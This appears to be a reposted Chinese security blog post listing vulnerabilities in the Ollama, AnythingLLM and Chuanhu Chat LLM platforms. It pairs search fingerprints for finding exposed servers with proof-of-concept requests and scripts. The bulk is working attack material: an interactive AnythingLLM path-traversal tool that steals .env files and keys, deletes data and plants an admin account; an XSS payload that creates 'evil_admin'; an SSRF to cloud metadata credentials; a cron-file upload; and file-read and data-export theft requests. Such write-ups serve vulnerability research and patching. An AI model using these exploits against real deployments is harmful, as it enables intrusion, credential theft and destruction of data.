文章总结: 这篇文章详细介绍了三个大语言模型平台Ollama、AnythingLLM和Chuanhugpt存在的多个安全漏洞,包括路径遍历、文件泄露、SSRF、XSS、越权访问等问题,并提供了漏洞指纹识别信息和利用示例,提醒用户关注AI平台安全风险并及时更新补丁。 综合评分: 86 文章分类: 漏洞分析,AI安全,漏洞预警,WEB安全,漏洞POC
大模型(LLM)平台漏洞
dmd5安全
dmd5安全
2025年12月19日 16:11 江西
ollama
一个开源工具,允许在本地运行大语言模型,确保数据隐私和控制
指纹:
app="Ollama" && is_domain=false
漏洞:
CVE-2024-28224CVE-2024-37032CVE-2024-39719CVE-2024-39720CVE-2024-39721CVE-2024-39722CVE-2024-45436
CVE-2024-39722
在 Ollama 版本低于 0.1.46 中,发现了通过 api/push 路由的路径遍历问题该漏洞可暴露部署服务器上的文件存在情况。
//获取模型信息/api/tags//生成文本接口POST /api/generate{"model": "<model-name>", //模型名称"prompt": "<input-text>", //输入内容"stream": false,"options": {"temperature": 0.7,"max_tokens": 100}}//交谈接口POST /api/chat{"model": "<model-name>", //模型名称"messages": [{"role": "user","content": "<input-text>" //输入内容}],"stream": false,"options": {"temperature": 0.7,"max_tokens": 100}}//显示有关模型的详细信息,包括模型文件、模板、参数等POST /api/show{"model": "<model-name>", //模型名如:deepseek-r1:32b"verbose": true}//拉取模型接口POST /api/pull{"name": "<model-name>"}//慎用DELETE /api/delete{"model": "<model-name>"}
Ollama 越界读取漏洞—CVE-2024-39720
在 Ollama 版本 0.1.46 之前存在一个问题。攻击者可以使用两个 HTTP 请求上传一个仅包含 4 字节且以 GGUF 自定义魔数头开始的畸形 GGUF 文件。通过利用一个包含指向攻击者控制的 blob 文件的 FROM 语句的自定义 Modelfile,攻击者可以通过 CreateModel 路由使应用程序崩溃,导致段错误(信号 SIGSEGV:段违规)
接口:/api/create
路径遍历—CVE-2024-39722
在 Ollama 版本低于 0.1.46 中,发现了通过 api/push 路由的路径遍历问题,该漏洞可暴露部署服务器上的文件存在情况。
文件泄露—CVE-2024-39719
在 Ollama 版本 0.3.14 及之前版本中,通过 api/create 接口可以发现文件存在泄露的问题。当调用 CreateModel 路由并传入一个不存在的路径参数时,会向攻击者返回“文件不存在”的错误信息,从而为攻击者提供了服务器上文件存在的线索。
当使用不存在的 path 参数调用 CreateModel 路由时,Ollama 会向攻击者反映“File does not exist”错误,为服务器上存在的文件提供原语,并使威胁行为者更容易进一步滥用应用程序。攻击者具有 os 的反射。Stat 命令输出,并可以控制文件路径。
~/ curl "" -d '{"name": "file-leak-existence","path": "/tmp/aasd.txt"}'{"error":"error reading modelfile: open /tmp/aasd.txt: no such file or directory"}%
AnythingLLM
用于使用任何大语言模型(LLM)与文档对话的AI应用,确保隐私和易用性
指纹:
body="<title>AnythingLLM | Your personal LLM trained on anything</title>"
漏洞:
1、SSRF
AnythingLLM中包含Web爬虫模块,使授权用户能够从EC2实例中抓取元数据,从而可能泄露敏感信息
在Web爬虫中输入以下URL
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
2、路径遍历导致文件删除
此漏洞允许未经授权的攻击者删除文件系统中的文件和文件夹,例如数据库文件。anythingllm.d
DELETE /api/system/remove-document HTTP/1.1Host: Authorization: Bearer ey{"name":"../../../../app/server/storage/anythingllm.db"}
DELETE /api/system/remove-folder HTTP/1.1Host: Authorization: Bearer ey{"name":"../../../../app/server/storage/imports"}
3、SSRF用户可以访问内部网络地址
POST /api/workspace/test/upload-link HTTP/1.1Host: localhost.com:3001User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: http://localhost.com:3001/workspace/testAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbjEyMyIsImlhdCI6MTcwNDg4MjA0MCwiZXhwIjoxNzA3NDc0MDQwfQ.j2Q0G6Wdfv8H_A68wa2Q1c3qUbXZ1stagKk9BggvyR4Content-Type: text/plain;charset=UTF-8Content-Length: 42Origin: http://localhost.com:3001Connection: closePragma: no-cacheCache-Control: no-cache{"link":"http://192.168.2.48/dashboard.html"}
4、信息泄露用户可以获取所有系统数据库信息,如用户名、密码api_key等
import requestsimport jsonattacker_auth_token="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJ1c2VyMiIsImlhdCI6MTcwNDg5NTIwMCwiZXhwIjoxNzA3NDg3MjAwfQ.W5KhIkbUdgkjJ5QiwcjTTQ8NuNbzyZS3JwgijyurZ_s" #put attacker auth_token#get exported zip filedef get_export(filename):burp0_url = "http://localhost.com:3001/api/system/data-exports/"+filename;burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Connection": "close", "Referer": "http://localhost.com:3001/settings/export-import"}req=requests.get(burp0_url, headers=burp0_headers)with open('aa.zip','wb') as output_file:output_file.write(req.content)#create a export filedef create_export():burp0_url = "http://localhost.com:3001/api/system/data-export"burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Referer": "http://localhost.com:3001/settings/export-import", "Authorization": "Bearer "+attacker_auth_token,"Connection": "close", "Pragma": "no-cache", "Cache-Control": "no-cache"}rr=requests.get(burp0_url, headers=burp0_headers).json()return(rr["filename"])ff=create_export()get_export(ff)
5、越权
允许匿名攻击者(无需应用程序帐户)导入自己的数据库文件,导致现有 anythingllm.db 文件被删除或伪造。通过利用此漏洞,攻击者可以向用户提供恶意数据或收集他们的信息。漏洞源于应用程序未能正确限制对数据导入功能的访问,从而允许未经授权的数据库操作。
POST /api/system/data-import HTTP/1.1Host: localhost:3001Content-Type: multipart/form-data; boundary=---------------------------33395526712532357982198249216Content-Length: 5181-----------------------------33395526712532357982198249216Content-Disposition: form-data; name="file"; filename="bad.zip"Content-Type: application/zipPK[ANYTHINGLLM DATABASE FILE IN HEX]
6、XSS
工作区的聊天中有一个 XSS。此 XSS 允许在聊天用户的浏览器中注入 javascript 代码
import jsonimport timefrom flask import Flask, Responseapp = Flask(__name__)PAYLOAD = ["""<img src="x" onerror="fetch('/api/admin/users/new', {method: 'POST',headers: {'Authorization': `Bearer ${localStorage.getItem('anythingllm_authToken')}`,'Content-Type':'application/json'}, body: JSON.stringify({username: 'evil_admin', password: 'password', role: 'admin'})})"/>"""]@app.route("/v1/models")def models():return Response(json.dumps({"object": "list", "data": [{"id": "phi-2", "object": "model"}]}))@app.route("/v1/chat/completions", methods=["GET", "POST", "DELETE"])def completions():def generate():for c in PAYLOAD:v = {"created": 1704831445,"object": "chat.completion.chunk","id": "c297576e-9cf9-45dd-ac3f-d12039d1fd34","model": "phi-2","choices": [{"index": 0, "delta": {"role": "assistant", "content": c}}],"usage": {"prompt_tokens": 0,"completion_tokens": 0,"total_tokens": 0,},}yield "data: " + json.dumps(v) + "\n" * 2time.sleep(0.01)yield """data: {"created":1704831445,"object":"chat.completion.chunk","id":"c297576e-9cf9-45dd-ac3f-d12039d1fd34","model":"phi-2","choices":[{"index":0,"finish_reason":"stop","delta":{"content":""}}],"usage":{"prompt_tokens":0,"completion_tokens":0,"total_tokens":0}}""" + "\n" * 2 + """data: [DONE]""" + "\n" * 2return Response(generate(), mimetype="text/plain")if __name__ == "__main__":app.run(port=8080)
7、路径遍历漏洞
此漏洞使管理员能够读取、删除或覆盖 ‘anythingllm.db’ 数据库文件以及存储在 ‘storage’ 目录中的其他文件(如内部通信密钥和 .env 秘密)
import requestsfrom urllib.request import urlretrieveimport sqlite3import jsonimport base64target = "http://172.17.0.1:3001" # app urluserAuthzToken = "" # manager authz token.reqHeaders = { "Authorization": "Bearer " + userAuthzToken }workspaceName = "" # any workspace that exists on the app.def getPfpFilename():data = ((userAuthzToken.split("."))[1] + '==').encode('utf-8')myUsername = json.loads(base64.b64decode(data).decode('utf-8'))['username']endpoint = target + "/api/admin/users"res = requests.get(endpoint, headers=reqHeaders).json()['users']for i in range(0, len(res)):if res[i]['username'] == myUsername:return res[i]['pfpFilename']return Falsedef setLogoFilename(filename):endpoint = target + "/api/admin/system-preferences"data = { "logo_filename": f"../ ../{filename}" }res = requests.post(endpoint, json=data, headers=reqHeaders)return res.json()def getFileContent():endpoint = target + "/api/system/logo"res = requests.get(endpoint, headers=reqHeaders)return resdef deleteFile():endpoint = target + "/api/system/remove-logo"res = requests.get(endpoint, headers=reqHeaders)return res.textdef triggerDoS():endpoint = target + f"/api/workspace/{workspaceName}/upload-link"data = {"link":"https://www.google.com"}res = requests.post(endpoint, json=data, headers=reqHeaders)return res.json()def uploadFileAsPFP():endpoint = target + "/api/system/upload-pfp"files = {"file": open("anythingllm.db", "rb")}res = requests.post(endpoint, files=files, headers=reqHeaders)def overwriteFile(pfp):endpoint = target + "/api/document/move-files"data = {"files":[{"from":f"../ ../assets/pfp/{pfp}","to":"../ ../anythingllm.db"}]}res = requests.post(endpoint, json=data, headers=reqHeaders)return res.json()def insertNewUser(username):dbConnection = sqlite3.connect("anythingllm.db")query = f"INSERT into users(username, password, role) values('{username}', '$2b$10$6fMWe7yJ0.zFmmIXv.qz7e71iN9TIiQTkXJorGOorrUJ09PLu03CC', 'admin')"db = dbConnection.cursor()result = db.execute(query)dbConnection.commit()users = db.execute("SELECT * FROM users").fetchall()dbConnection.close()return usersbanner = '''** AnythingLLM Path traversal POC **[Menu][1] Arbitrary File Read.[2] Arbitrary File Deletion.[3] DoS attack (Shutdown the app).[4] Overwrite database file.'''files = '''> anythingllm.db> comkey/ipc-priv.pem> comkey/ipc-pub.pem> .env'''print(banner)action = input("[#]> ")match action:case "1":print(files)f = input("[File]> ")setLogoFilename(f)print("\n" + getFileContent().text)out = {'anythingllm.db':'anythingllm.db', '.env':'_.env.txt', 'comkey/ipc-priv.pem':'ipc-priv.pem', 'comkey/ipc-pub.pem':'ipc-pub.pem'}with open(out[f], mode="wb") as file:file.write(getFileContent().content)print(f"[+] File saved to: {out[f]}")case "2":print(files)f = input("[File]> ")setLogoFilename(f)deleteFile()print(f"\n[+] {f} has been deleted!")case "3":try:setLogoFilename("comkey/ipc-priv.pem")deleteFile()triggerDoS()except Exception as msg:print("\n[+] DoS attack! App went down.")case "4":setLogoFilename("anythingllm.db")with open("anythingllm.db", mode="wb") as file:file.write(getFileContent().content)uname = input("\n[NewAdminAccount] [Username]> ")print("\n[Password]> superadmin\n")insertNewUser(uname)uploadFileAsPFP()overwriteFile(getPfpFilename())print(f"\n[+] Account has been created!")print(f"[!] Since this has overwrite the database file, changes will only appear on the next App reboot or update. To confirm that try restarting the docker container and login with the newly created admin.")
8、敏感信息泄露
该 API 允许任何用户访问 AnythingLLM 系统的当前设置。
curl http://localhost:3001/api/setup-complete
Chuanhugpt
指纹:
body="<meta name=\"application-name\" content=\"川虎 Chat\">"
漏洞:
1、未授权访问
/file=config.json
2、XSS上传恶意的JS代码文件
POST /upload HTTP/1.1Host: 127.0.0.1:7860[...]-----------------------------231038340829311824402972658171Content-Disposition: form-data; name="files"; filename="hello3.txt"Content-Type: text/plainIT IS TOTALLY NORMAL DOCUMENTA LOT OF PAGES, A LOT OF WORDS[SOME CONTENT]hello hello hello hello hello hello hello hello hello hello, this is my payload: <img src=x onerror=alert(5)>a b c d e f g h i j k l m n o p q r s t u v x y z-----------------------------231038340829311824402972658171--
3、越权能够读取其他用户的聊天记录
/file=./history/jane_smith/Jane's%20sensitive%20data.json
4、本地文件包含
http://localhost:7860/file=./historyhttp://localhost:7860/file=./history/passwd
5、任意文件上传
POST /upload HTTP/1.1Host: 127.0.0.1:7860User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1:7860/Content-Type: multipart/form-data; boundary=---------------------------330262580617276905211507475889Origin: http://127.0.0.1:7860Content-Length: 270Connection: closeCookie: _ga=GA1.1.898989309.1712525195; _gid=GA1.1.684123961.1712525195; _ga_R1FN4KJKJH=GS1.1.1712528655.2.1.1712528675.0.0.0Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------330262580617276905211507475889Content-Disposition: form-data; name="files"; filename="test.html"Content-Type: text/html<h1>test</h1><img src=x onerror=alert(1)>-----------------------------330262580617276905211507475889--
6、文件覆盖漏洞
// PoC.pyimport requests# 构造要发送的数据包data = {"data": [None, "./config.json", [], None],"event_data": None,"fn_index": 36,"trigger_id": 39,"session_hash": "ax12j6jmdzq"}# 读取文件列表files_list = ["./config.json","./config_example.json","./configs/ds_config_chatbot.json","./locale/en_US.json","./locale/ja_JP.json","./locale/ko_KR.json","./locale/ru_RU.json","./locale/sv_SE.json","./locale/vi_VN.json","./locale/zh_CN.json","./templates/1 中文提示词.json","./templates/3 繁體提示詞.json","./templates/4 川虎的Prompts.json","./templates/5 日本語Prompts.json","./templates/6 Russian Prompts.json"]# 发送POST请求for file_path in files_list:url = "http://127.0.0.1:7860/queue/join?"headers = {"sec-ch-ua": '"Chromium";v="123", "Not:A-Brand";v="8"',"sec-ch-ua-platform": "Windows","sec-ch-ua-mobile": "?0","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36","Content-Type": "application/json","Accept": "*/*","Origin": "http://127.0.0.1:7860","Sec-Fetch-Site": "same-origin","Sec-Fetch-Mode": "cors","Sec-Fetch-Dest": "empty","Referer": "http://127.0.0.1:7860/","Accept-Encoding": "gzip, deflate, br","Accept-Language": "zh-CN,zh;q=0.9","Cookie": "_ga=GA1.1.794330819.1713639945; _gid=GA1.1.1338534025.1713639945; _gat_gtag_UA_156449732_1=1; _ga_R1FN4KJKJH=GS1.1.1713719843.7.1.1713719844.0.0.0","Connection": "close"}data["data"][1] = file_path # 更新要发送的数据包中的文件路径response = requests.post(url, json=data, headers=headers)print(f"POST请求发送到 {url},响应状态码:{response.status_code}")data["fn_index"] = 66 # reboot_chuanhuresponse = requests.post(url, json=data, headers=headers)print(f"POST请求发送到 {url},响应状态码:{response.status_code}")
7、路径遍历漏洞
cron 文件将上传到 /etc/cron.d/variables,系统将执行 “echo Hello >> /var/log/test.log”
curl -X POST -H 'sec-ch-ua-mobile: ?0' -H 'Origin: [http://127.0.0.1:7860](http://127.0.0.1:7860/)' -H 'Accept-Language: zh-CN,zh;q=0.9' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36' -H 'sec-ch-ua-platform: "Windows"' -H 'Accept: */*' -H 'Sec-Fetch-Mode: cors' -H 'Cookie: access-token-XK0iqC1n6I56zluAvChAdxpubSrQtLHsWhXpDx2YuVs=Y8JI1rgI_Fvky68qYgMl-Q; access-token-unsecure-XK0iqC1n6I56zluAvChAdxpubSrQtLHsWhXpDx2YuVs=Y8JI1rgI_Fvky68qYgMl-Q; _ga_R1FN4KJKJH=GS1.1.1715020380.1.0.1715020380.0.0.0; _ga=GA1.1.550151323.1715020380; _gid=GA1.1.462705340.1715020380' -H 'Referer: http://127.0.0.1:7860/' -H 'Accept-Encoding: gzip, deflate, br, zstd' -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynnaJ7AeUseaRveRO' -H 'sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Site: same-origin' -d '------WebKitFormBoundarynnaJ7AeUseaRveROContent-Disposition: form-data; name="files"; filename="variables"Content-Type: application/json* * * * * root /bin/bash -c "echo Hello >> /var/log/test.log"------WebKitFormBoundarynnaJ7AeUseaRveRO--' 'http://127.0.0.1:7860/upload'
8、XSS上传下面的json文件
{"system": "You are a helpful assistant.","history": [{"role": "user","content": "hello"},{"role": "assistant","content": "Hello there! How can I assist you today?"}],"chatbot": [["<div class=\"user-message\">hello</div>","<img src=x onerror=alert(document.domain)><div class=\"raw-message hideM\"><pre class=\"fake-pre\">Hello there! How can I assist you today?</pre></div><div class=\"md-message\">\n\nHello there! How can I assist you today?\n</div>"]],"model_name": "gpt-3.5-turbo","single_turn": false,"temperature": 1.0,"top_p": 1.0,"n_choices": 1,"stop_sequence": [],"token_upper_limit": 30720,"max_generation_token": null,"presence_penalty": 0.0,"frequency_penalty": 0.0,"logit_bias": null,"user_identifier": "user1","metadata": {}}
9、越权
POST /queue/join? HTTP/1.1Host: 127.0.0.1:7860Cookie:<Cookie_here>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1:7860/Content-Type: application/jsonContent-Length: 90Origin: http://127.0.0.1:7860Connection: closeSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originPriority: u=4{"data":[],"event_data":null,"fn_index":66,"trigger_id":null,"session_hash":"9alzfpcb0mt"}
POST /queue/join? HTTP/1.1Host: 127.0.0.1:7860User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1:7860/Content-Type: application/jsonContent-Length: 92Origin: http://127.0.0.1:7860Connection: closeCookie: <Cookie_Here>Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originPriority: u=4{"data":["Folder_Location_Here"],"event_data":null,"fn_index":37,"trigger_id":23,"session_hash":"8xp7gyfjei"}
POST /queue/join? HTTP/1.1Host: 127.0.0.1:7860Cookie: access-token-Am86qIikSe34XMu5FQqcu0jasA_03gF2Wy8qA0pI5u4=f-Jm7TzZPwosPrsxQvaXfw; access-token-unsecure-Am86qIikSe34XMu5FQqcu0jasA_03gF2Wy8qA0pI5u4=f-Jm7TzZPwosPrsxQvaXfw;Content-Length: 118{"data":[null,"history/pink/pink",null],"event_data":null,"fn_index":38,"trigger_id":29,"session_hash":"imzrkogx1n"}
10、任意文件读取漏洞
导航到对话框 – 加载提示模板 – 选择提示模板 集合文件 – 选择并拦截将文件路径修改为“C:[file]”以读取特定文件的请求。程序会用逗号将特定文件分成两部分,一部分会显示在 “View Loaded from Prompt Template” 中
POST /queue/join? HTTP/1.1Host: your-ipContent-Length: 112User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36Content-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ar;q=0.8Cookie: access-token-unsecure--qzwh1tjWCUIOHHAZ3sefepz6vRqY57nyI1lEdlfSHI=OaSUWeuqcw0Oh4i777bzzQ; access-token-unsecure-oTXSn2P9ckgz1K-xU8JB-rsodXof8LayUQmsOT9VIqU=iR2uiKEM3FKKfWZssy58dw; access-token-unsecure-qgwf7iYOl_WdV2O1oBHZiWM5rDAuCXd3sexLMB-wSYk=bVPI4x5t0b92FKPRgRTWaQ; access-token-unsecure-12YQiCcauHyr_KZ27JFqyHpJt0gcYuVEEW-F5lYmgQw=8Ch8NejT59NCI-JlzLv06g; access-token-unsecure-qW3kSs6--DsLHKyhsJlKhs3GJC1-fIDrEMjRnWgFJI4=UgaJ9Xm5zAOT1sZ0ITvvFg; access-token-unsecure-yv5uGFzc5-97C28npGnSymwoemIsxAKy_rCggh_ZLrc=7RwdeTah2C4wGh8zLjrmZA; access-token-unsecure-mckM-DSxzSe1yBgBoG03qQHHEoGbCupYiqZYymCF_FY=Mnxlh9_XsxWEe2KJswP4Cg; access-token-unsecure-5til-rhEKMyCdlc1IvmY1jRuWAcP58deJv3IrtTJnS8=z7xjGvpnaUME6yG45jmy0Q; access-token-unsecure-a9IugPktNemA8NgEsugwpq1W6FP4cnP3RNGzmHdgRVI=T38IGGaHTUt58fU5A4KWQw; access-token-unsecure-UWizKqGvoH0jL7XmcvB97gfGCpcc0fpZh551wc5RM2Y=fS_NDm8iyEndtilqfmwM3A; access-token-unsecure-9E32aajg7zeEKvPatonMRSHD8I-mqCeuLcJKjwylL3Y=38v_fhgs6f218euwg3W47AConnection: closeAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Connection: closeCache-Control: max-age=0{"data":["C://Windows/DTCINSTALL.log"],"event_data":null,"fn_index":33,"trigger_id":97,"session_hash":"cjml0226cz"}
POST /queue/join? HTTP/1.1Host: your-ipContent-Length: 167User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36Content-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ar;q=0.8Cookie: access-token-unsecure--qzwh1tjWCUIOHHAZ3sefepz6vRqY57nyI1lEdlfSHI=OaSUWeuqcw0Oh4i777bzzQ; access-token-unsecure-oTXSn2P9ckgz1K-xU8JB-rsodXof8LayUQmsOT9VIqU=iR2uiKEM3FKKfWZssy58dw; access-token-unsecure-qgwf7iYOl_WdV2O1oBHZiWM5rDAuCXd3sexLMB-wSYk=bVPI4x5t0b92FKPRgRTWaQ; access-token-unsecure-12YQiCcauHyr_KZ27JFqyHpJt0gcYuVEEW-F5lYmgQw=8Ch8NejT59NCI-JlzLv06g; access-token-unsecure-qW3kSs6--DsLHKyhsJlKhs3GJC1-fIDrEMjRnWgFJI4=UgaJ9Xm5zAOT1sZ0ITvvFg; access-token-unsecure-yv5uGFzc5-97C28npGnSymwoemIsxAKy_rCggh_ZLrc=7RwdeTah2C4wGh8zLjrmZA; access-token-unsecure-mckM-DSxzSe1yBgBoG03qQHHEoGbCupYiqZYymCF_FY=Mnxlh9_XsxWEe2KJswP4Cg; access-token-unsecure-5til-rhEKMyCdlc1IvmY1jRuWAcP58deJv3IrtTJnS8=z7xjGvpnaUME6yG45jmy0Q; access-token-unsecure-a9IugPktNemA8NgEsugwpq1W6FP4cnP3RNGzmHdgRVI=T38IGGaHTUt58fU5A4KWQw; access-token-unsecure-UWizKqGvoH0jL7XmcvB97gfGCpcc0fpZh551wc5RM2Y=fS_NDm8iyEndtilqfmwM3A; access-token-unsecure-9E32aajg7zeEKvPatonMRSHD8I-mqCeuLcJKjwylL3Y=38v_fhgs6f218euwg3W47AConnection: closeAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Connection: closeCache-Control: max-age=0
参考文章:
https://www.freebuf.com/articles/ai-security/454819.html
查看原文:《大模型(LLM)平台漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论